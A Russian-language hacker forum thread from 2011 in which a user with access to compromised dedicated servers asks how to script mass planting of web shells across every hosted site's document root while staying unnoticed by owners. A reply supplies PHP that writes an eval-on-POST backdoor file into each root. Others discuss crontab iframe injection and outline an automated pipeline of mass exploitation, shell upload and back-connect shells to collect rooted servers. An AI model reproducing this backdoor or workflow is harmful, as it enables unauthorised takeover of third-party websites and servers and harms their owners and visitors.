Старый 21.01.2011, 14:01   #1
AloneKiller
 
Аватар для AloneKiller
 
Регистрация: 04.10.2010
Сообщений: 79
Репутация: 0
Arrow Как пролить сайты на дедики шелами рекурсивно?

Здравствуйте.

Есть дедики freebsd\linux, подскажите пожалуйста способ пролить сайты на них шелами автоматически (скриптом), конфиг апача\нгикса ессно есть, парсить умеею, можно выделить для кадого сайта документ_рут. Но как дальше, если пролить все сайты одинаково, то владельцы сильно зачешутся, есть какие мысли? Ну то что тачить и човнить под каждый сайт шел надо отдельно - это мелочи, сам знаю как делать.
AloneKiller вне форума   Ответить с цитированием
Старый 21.01.2011, 15:12   #2
hard
Banned
 
Регистрация: 06.07.2010
Сообщений: 50
Репутация: 1
По умолчанию

PHP код:
foreach ($document_roots as $dir)
    file_put_contents($dir . '/shell.php', '<? eval(stripslashes($_POST['command'])); ?>');
только непонятно зачем тут рекурсия и для чего так палиться перед админами.
hard вне форума   Ответить с цитированием
Старый 21.01.2011, 16:59   #3
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

непонятно,спилберх.
Цитата:
пролить сайты на дедики шелами рекурсивно?
залить сайты на дедики с шелла и сделать это рекурсивно?
или залить шеллы на сайты,которые на дедике?
snake вне форума   Ответить с цитированием
Старый 21.01.2011, 17:03   #4
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

2 snake:

))) карочи проифреймить усё)))

Поддерживаю второй пост темы = автоматизация таких вещей исключена, исходя из высоких моральных соображений кидиса, стремящегося быть гуру типо ^_^
Pashkela вне форума   Ответить с цитированием
Старый 21.01.2011, 17:06   #5
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

автоифреймеров - лопатой греби.удобнее будет в кронтаб засандалить все это дело.Хотя и проживет оно не долго)
snake вне форума   Ответить с цитированием
Старый 21.01.2011, 19:43   #6
AloneKiller
 
Аватар для AloneKiller
 
Регистрация: 04.10.2010
Сообщений: 79
Репутация: 0
По умолчанию

Немного коламбурно написал первый пост. В общем, смысл в том, есть дедик, машина с вхостами. Вручную обрабатывать мелкие сайты, типа с тиц 10, нулевки - нудно и сложно. Если бы можно было скриптом пролить на них шелы, получить ссылки в лог, то было б супер.
AloneKiller вне форума   Ответить с цитированием
Старый 21.01.2011, 20:18   #7
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Если бы можно было скриптом пролить на них шелы, получить ссылки в лог, то было б супер.
ну чо за фуфло, а как же "маскироваться" под окружающую обстановку и прочее? Неужели цель просто залить шелл, пусть и на 1 день? Нету такого в паблике и в привате тоже вряд ли, потому что ни один нормальный хекер такой хней заниматься не будет. Нужен коли сайт - будет добр напрягись децл

"Автоматизация залития шеллов" - про ифрейм слыхал, но такое - это уже вообще ппц ^_^

Последний раз редактировалось Pashkela; 21.01.2011 в 20:22..
Pashkela вне форума   Ответить с цитированием
Старый 21.01.2011, 21:29   #8
AloneKiller
 
Аватар для AloneKiller
 
Регистрация: 04.10.2010
Сообщений: 79
Репутация: 0
По умолчанию

Я понимаю, что если класть одинаковый файлик в корень, то жить он будет не долго, вот я и спрашивал как сделать лучше, может модифицировать чего или сгенерить... В целом понял, что врядли найду, думал просто может кто-то писал подобную штуку. Одно дело тицовые и посещаемые ресурсы, а другое дело нулёвки всякие, такие можно б было и проливать. Ведь админы глобальные не следят за каждым ресурсом отдельно. Ну и потом если так пролить все сайты, потом можно зайти на каждый шел и перепрятать его, это куда удобнее, чем по ссш, времени просто много уходит.
AloneKiller вне форума   Ответить с цитированием
Старый 21.01.2011, 21:36   #9
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Да не важно, какой тиц или pr, дело в принципе, тем более стыдно, если админ "нулевого" ресурса тебя попалит
Pashkela вне форума   Ответить с цитированием
Старый 22.01.2011, 01:18   #10
Iceangel_
 
Аватар для Iceangel_
 
Регистрация: 01.07.2010
Сообщений: 45
Репутация: 25
По умолчанию

Цитата:
"Автоматизация залития шеллов" - про ифрейм слыхал, но такое - это уже вообще ппц ^_^
Зря так, довольно удобно порой, к примеру: есть бажный движок, автоматизированно парсишь линки на двиг с гугла, пишешь плоент-автозаливщик, суешь в него эти 100500 линков и полученные на выходе 100499 линков отправляешь в менеджер для этих самых шелленгов, который на выходе дает версии линухов и Glibc(потенциально бажные подсвечиваются), по нажатии на которые автоматически кидается бекконект. В итоге у тебя неплохая база рутнутых серверов, разве это ппц? )

2 AloneKiller
Цитата:
Есть дедики freebsd\linux, подскажите пожалуйста способ пролить сайты на них шелами автоматически (скриптом)
Поддерживаю мнение Пашкелы, вряд ли ты такой скрипт в интернетах найдешь, самому кодить придется, http://php.net/manual/en/ref.ssh2.php пригодится мб.

Последний раз редактировалось Iceangel_; 22.01.2011 в 02:05..
Iceangel_ вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot